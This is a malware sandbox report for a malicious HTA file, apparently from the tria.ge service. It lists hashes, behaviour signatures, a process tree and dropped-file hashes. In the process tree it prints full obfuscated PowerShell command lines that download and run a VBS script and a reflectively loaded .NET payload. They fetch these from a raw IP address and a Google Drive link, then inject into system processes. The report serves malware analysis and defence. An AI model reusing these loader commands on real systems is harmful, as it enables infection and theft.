Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 03:22
Static task
static1
Behavioral task
behavioral1
Sample
e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta
Resource
win10v2004-20241007-en
General
-
Target
e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta
-
Size
206KB
-
MD5
a67cc7c8b7c0047d1bee23eb85b041c6
-
SHA1
ff5141beb7b39c95c6ac9934e26a17603ac4309f
-
SHA256
e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931
-
SHA512
38c06a12ace2b347c90fc52f20bc0a84c037a9c711084348a2122686ad122f64117249535ce797e6c6cf1e554b1b397382d187baef53ef5e0a2d028c8e6bed91
-
SSDEEP
96:43F97ZkK7E5lKFE5qbZIgrHlcARlNRoyX1K+K9nE5nKLQ:43F1ZNA5sm5DgryAvoyMby5KLQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 35 IoCs
flow pid Process 16 1224 pOWErSHElL.eXE 19 932 powershell.exe 24 932 powershell.exe 28 932 powershell.exe 43 4876 mshta.exe 46 4876 mshta.exe 50 4876 mshta.exe 52 4876 mshta.exe 53 4876 mshta.exe 54 4876 mshta.exe 56 4876 mshta.exe 60 4876 mshta.exe 62 4876 mshta.exe 63 4876 mshta.exe 64 4876 mshta.exe 68 4876 mshta.exe 70 4876 mshta.exe 71 4876 mshta.exe 72 4876 mshta.exe 73 4876 mshta.exe 75 4876 mshta.exe 77 4876 mshta.exe 78 4876 mshta.exe 79 4876 mshta.exe 80 4876 mshta.exe 82 4876 mshta.exe 83 4876 mshta.exe 84 4876 mshta.exe 85 4876 mshta.exe 86 4876 mshta.exe 88 4876 mshta.exe 90 4876 mshta.exe 91 4876 mshta.exe 92 4876 mshta.exe 93 4876 mshta.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3584 powershell.exe 932 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1224 pOWErSHElL.eXE 1632 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 drive.google.com 19 drive.google.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 932 set thread context of 4368 932 powershell.exe 108 PID 4368 set thread context of 4876 4368 aspnet_regbrowsers.exe 84 PID 4368 set thread context of 4048 4368 aspnet_regbrowsers.exe 109 PID 4048 set thread context of 4876 4048 cleanmgr.exe 84 PID 4048 set thread context of 400 4048 cleanmgr.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWErSHElL.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \Registry\User\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cleanmgr.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings pOWErSHElL.eXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 1224 pOWErSHElL.eXE 1224 pOWErSHElL.eXE 1632 powershell.exe 1632 powershell.exe 3584 powershell.exe 3584 powershell.exe 932 powershell.exe 932 powershell.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4368 aspnet_regbrowsers.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 4368 aspnet_regbrowsers.exe 4876 mshta.exe 4876 mshta.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe 4048 cleanmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1224 pOWErSHElL.eXE Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4876 wrote to memory of 1224 4876 mshta.exe 88 PID 4876 wrote to memory of 1224 4876 mshta.exe 88 PID 4876 wrote to memory of 1224 4876 mshta.exe 88 PID 1224 wrote to memory of 1632 1224 pOWErSHElL.eXE 90 PID 1224 wrote to memory of 1632 1224 pOWErSHElL.eXE 90 PID 1224 wrote to memory of 1632 1224 pOWErSHElL.eXE 90 PID 1224 wrote to memory of 3288 1224 pOWErSHElL.eXE 95 PID 1224 wrote to memory of 3288 1224 pOWErSHElL.eXE 95 PID 1224 wrote to memory of 3288 1224 pOWErSHElL.eXE 95 PID 3288 wrote to memory of 1856 3288 csc.exe 97 PID 3288 wrote to memory of 1856 3288 csc.exe 97 PID 3288 wrote to memory of 1856 3288 csc.exe 97 PID 1224 wrote to memory of 4556 1224 pOWErSHElL.eXE 100 PID 1224 wrote to memory of 4556 1224 pOWErSHElL.eXE 100 PID 1224 wrote to memory of 4556 1224 pOWErSHElL.eXE 100 PID 4556 wrote to memory of 3584 4556 WScript.exe 101 PID 4556 wrote to memory of 3584 4556 WScript.exe 101 PID 4556 wrote to memory of 3584 4556 WScript.exe 101 PID 3584 wrote to memory of 932 3584 powershell.exe 103 PID 3584 wrote to memory of 932 3584 powershell.exe 103 PID 3584 wrote to memory of 932 3584 powershell.exe 103 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 932 wrote to memory of 4368 932 powershell.exe 108 PID 4876 wrote to memory of 4048 4876 mshta.exe 109 PID 4876 wrote to memory of 4048 4876 mshta.exe 109 PID 4876 wrote to memory of 4048 4876 mshta.exe 109 PID 4048 wrote to memory of 400 4048 cleanmgr.exe 114 PID 4048 wrote to memory of 400 4048 cleanmgr.exe 114
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\SysWOW64\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE"C:\Windows\SystEM32\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE" "PowersheLl -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE ; IEX($(iEX('[sysTem.tExT.encOdIng]'+[chAr]58+[chAr]58+'Utf8.GEtSTrinG([SYsTEM.CoNveRT]'+[ChaR]0X3A+[CHAR]0X3A+'FroMbase64sTriNG('+[cHAr]34+'JHhTejB4TmxHaWk2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFUmRFRkluSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTW9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdraXR5bWpubixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0QWxZenN4cSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZm1BcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXBxeHVFdkFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZmT3hnV2pUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhb1R3RkxYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4U3oweE5sR2lpNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNjEuMTMwLzExMi9zZWV0aGViZXN0dGhpbmdzdG9nZXRtZXdpdGhncmVhdHRoaW5nc29uaGVyZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3RvZ2V0bWV3aXRoZ3JlYXR0aGluZ3Nvbi52YnMiLDAsMCk7c1RhUlQtc2xlZXAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N0b2dldG1ld2l0aGdyZWF0dGhpbmdzb24udmJzIg=='+[chAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5qyav0rl\5qyav0rl.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC93B.tmp" "c:\Users\Admin\AppData\Local\Temp\5qyav0rl\CSCFA569F0843CB4F51BF356FC66C2EBF3D.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1856
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIZWxsSURbMV0rJHNIRWxMaURbMTNdKydYJykgKCAoJ3QwM2ltYWdlVXJsID0gVWZsaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCJysnSjNqNjNMbDF0MlN0VmdHeGJTdDAgVWZsO3QwM3dlYicrJ0NsaWVudCAnKyc9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQnKyc7dDAzaW1hZ2VCeXRlcyA9IHQwM3dlYkNsaWVudC5Eb3dubG9hZERhdGEodDAzaW1hZ2VVcmwpO3QwM2ltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKHQwM2ltYWdlQnl0ZXMpO3QwM3N0YXJ0RmxhZyA9IFVmbDw8QkFTRTY0X1NUQVJUPj5VZmw7dDAzZW5kRmxhZyA9IFVmbDw8QkFTRTY0X0VORD4+VWZsO3QwM3N0YXJ0SW5kZXggPSB0MDNpbWFnZVRleHQuSW5kZXhPZih0MDNzdGFydEZsJysnYWcpO3QwM2VuZEluZGV4ID0gdDAzaW1hZ2VUZXh0LicrJ0luZGV4T2YodDAzZW5kRmxhZyk7dDAzc3RhcnRJbmRleCAtZ2UgMCAtYW5kJysnIHQwM2VuZEluZGV4JysnIC1ndCB0MDNzdGFydEluZGV4O3QwM3N0YXJ0JysnSW5kZXggKz0gdDAzc3RhcnRGbGFnJysnLkxlbmd0aDt0MDNiYXNlNjRMZW5ndGggPScrJyB0MDNlbmRJbmRleCAtIHQwM3N0YXJ0SW5kZXg7dDAzYmFzZTY0QycrJ29tbWFuZCA9IHQwM2ltYWdlVGV4dC5TdWJzJysndHInKydpbmcodDAzc3RhcnRJbmRleCwgdDAzYmFzZTY0TGVuJysnZ3RoKTt0MDNiYScrJ3NlNjRSZXZlcnNlZCA9IC1qb2luICh0MDNiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgSFpWIEZvckVhY2gtT2JqZWN0IHsgdDAzXyB9KVstMS4uLSh0MDNiYXNlNjRDb21tYW5kLkxlbmd0aCldO3QwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcodDAzYmFzZTY0UmV2ZXJzZWQpO3QnKycwM2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh0MDNjb21tYW5kQnl0ZXMpO3QwM3ZhaU1ldGhvZCA9IFtkbmxpYi5JTycrJy5Ib21lXS5HZXRNZXRob2QoVWZsVkFJVWZsKTt0MDN2YWlNZXRob2QuSW52b2tlKHQwM251bGwsIEAoVWZsJysndHh0LkdGU1NXWi8yMTEvMDMxLjE2LjI3MS43MDEvLzpwdHRoVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxhc3BuZXRfcmVnYnJvd3NlcnNVZmwsIFVmbGRlc2F0aXZhZG9VZmwsIFVmbGRlc2F0aXZhZG9VZmwsVWZsZGUnKydzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWRvVWZsLFVmbGRlc2F0aXYnKydhZG9VZicrJ2wsVWZsZGVzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWQnKydvVWZsLFVmbDFVZmwsVWZsZGVzYXRpdmFkb1VmbCkpOycpLlJFcExhY0UoKFtjSGFSXTcyK1tjSGFSXTkwK1tjSGFSXTg2KSxbc1RSSU5HXVtjSGFSXTEyNCkuUkVwTGFjRSgnVWZsJyxbc1RSSU5HXVtjSGFSXTM5KS5SRXBMYWNFKCd0MDMnLFtzVFJJTkddW2NIYVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHellID[1]+$sHElLiD[13]+'X') ( ('t03imageUrl = Uflhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKB'+'J3j63Ll1t2StVgGxbSt0 Ufl;t03web'+'Client '+'= New-Object System.Net.WebClient'+';t03imageBytes = t03webClient.DownloadData(t03imageUrl);t03imageText = '+'[System.Text.Encoding]::UTF8.GetString'+'(t03imageBytes);t03startFlag = Ufl<<BASE64_START>>Ufl;t03endFlag = Ufl<<BASE64_END>>Ufl;t03startIndex = t03imageText.IndexOf(t03startFl'+'ag);t03endIndex = t03imageText.'+'IndexOf(t03endFlag);t03startIndex -ge 0 -and'+' t03endIndex'+' -gt t03startIndex;t03start'+'Index += t03startFlag'+'.Length;t03base64Length ='+' t03endIndex - t03startIndex;t03base64C'+'ommand = t03imageText.Subs'+'tr'+'ing(t03startIndex, t03base64Len'+'gth);t03ba'+'se64Reversed = -join (t03base64Command.ToCharArray() HZV ForEach-Object { t03_ })[-1..-(t03base64Command.Length)];t03commandBytes = [System.Convert]::FromBase64String(t03base64Reversed);t'+'03loadedAssembly = [System.Reflection.Assembly]::Load(t03commandBytes);t03vaiMethod = [dnlib.IO'+'.Home].GetMethod(UflVAIUfl);t03vaiMethod.Invoke(t03null, @(Ufl'+'txt.GFSSWZ/211/031.16.271.701//:ptthUfl, UfldesativadoUfl, UfldesativadoUfl, UfldesativadoUfl, Uflaspnet_regbrowsersUfl, UfldesativadoUfl, UfldesativadoUfl,Uflde'+'sativadoUfl,UfldesativadoUfl,Ufldesativ'+'adoUf'+'l,UfldesativadoUfl,Ufldesativad'+'oUfl,Ufl1Ufl,UfldesativadoUfl));').REpLacE(([cHaR]72+[cHaR]90+[cHaR]86),[sTRING][cHaR]124).REpLacE('Ufl',[sTRING][cHaR]39).REpLacE('t03',[sTRING][cHaR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4368
-
-
-
-
-
-
C:\Windows\SysWOW64\cleanmgr.exe"C:\Windows\SysWOW64\cleanmgr.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:400
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD513f137a0e0fa08b17eebf2af46de4e7f
SHA10072958fcaae670b74be42a07629f8b3a2d4db1f
SHA25655d139ac5e08097aea59b886b574b63031afdad9fd3a4345724ebd4edd2a8ab6
SHA5124eab29fb777c71932497057c1d0b1984bc753ed47724f6b58991d791dfbbedc9f6515c7399c95245f7e77dfbfc11e52dcfd94a424e91f2d0993307c2e69a4bbb
-
Filesize
18KB
MD54271c0c566ad74df02b2954bc6b94ebf
SHA1c0ffffa48f586e7f44c89f24e341c96baec22ea0
SHA256ada15753d699260c673fc6e4cedd4eea74c794b75a6665d18f4c3c4e27f9aaef
SHA512b15743b40e721a1fdd30d70b54f71815b05bad809f2bdfb0712f695130e54c2bcb587b6241334386843a2002330809c149cf6d64dd5eca365bb93e349375d121
-
Filesize
3KB
MD5294347c09670cc41459b830c335792d1
SHA1215fb4430c08121c0e9ac12b57fbaa83e30f0aaa
SHA256cb7d2f7905e89a20db890fc1483148e5c0d9e7649b48a55b878359150d377191
SHA512ef604fb373f66a17a4c861dadebff76aece9a57fd2a84faa5f82f61dce36cd65d967b92160488ecefb68051ee358b8ea616df6640c288b52fc2984c54bb06945
-
Filesize
1KB
MD5ffad3b84ae3a399d95d3dbae46d9fe6b
SHA1f109ffc4df59590a4b2cebf98e5896f6890230f2
SHA2569915fe955e9642930ea14e858adc4d66bad31c388da2c61df9b17246e067c0ef
SHA512b66a9a93a72ae5455b624aed7ef3aeed18b5dc55839667f1a1d707e8be1f7cec343b05301f2d7d60dcfa64d311de5c1a71768c306e80122383258a64c53ad11c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
138KB
MD5494642e2a61a8b0e6bc9ebf07f58aa62
SHA1d7975e4dc0bedd03fbba1390e3e75bfd5f4c725c
SHA256ebe70ca2f1c620ca9e3615c0a69e3bf5fffeb3f9f8ba6672eab20c9e952ad311
SHA512ea79a010e1d7820cc7513c26614be8fc0b3d322055035815458b608be08e4bea293983c68c85a7f6746272d0ba86d45caa66e8d5318d78e8d565bd42a27c1aae
-
Filesize
486B
MD5af0e0993b960e9bba00f8a8f483423d8
SHA145f4d42e16df29c262a7e626cdad0281f19b99e9
SHA2562d5ac3d6056b2457bb1605d4bf44784ef1a51fb02ef49b5b384cd1c011255b0f
SHA51247e60eaf671bd7edf358d65416c2ca04b766f20e2ae733fc75720244d7a0366914e187142fa07cce86202497435cfec6bc573c4ede7d5cb00472d7ba33964919
-
Filesize
369B
MD5bdc03bde87186da87ac0cb0b660ee892
SHA177a785c385edfc3602e340900b9e8fe2734f16f4
SHA256c4965b6dacc5eabf1341bd74c17687fb44484bcab43ee156346fc6e0fc06692a
SHA512dc0a3e99d40790e460189f9753b1291c3773a4d206289c72d484fddce244572861d5db801f526d4aafec17aeb129ac8825e34a324adb7c1824dc0b49a14cd533
-
Filesize
652B
MD5858b9d5ac16d7528c74e7fb7d9649860
SHA1fc98d89b7e1a479a4df0df28b553791bb907aa82
SHA25674e75de9aa0a1c72e3b5b5b430451d512c3e60608ab9471e1d8633e1eb43d4ed
SHA512135b720d108f2e8bcf25960059bf170b066e2e467aa6d14e0d41f8da9c7f106c81a7380cb8e04daada04a8360e5ae394ae36900d894d6711d5939a4bbe66157d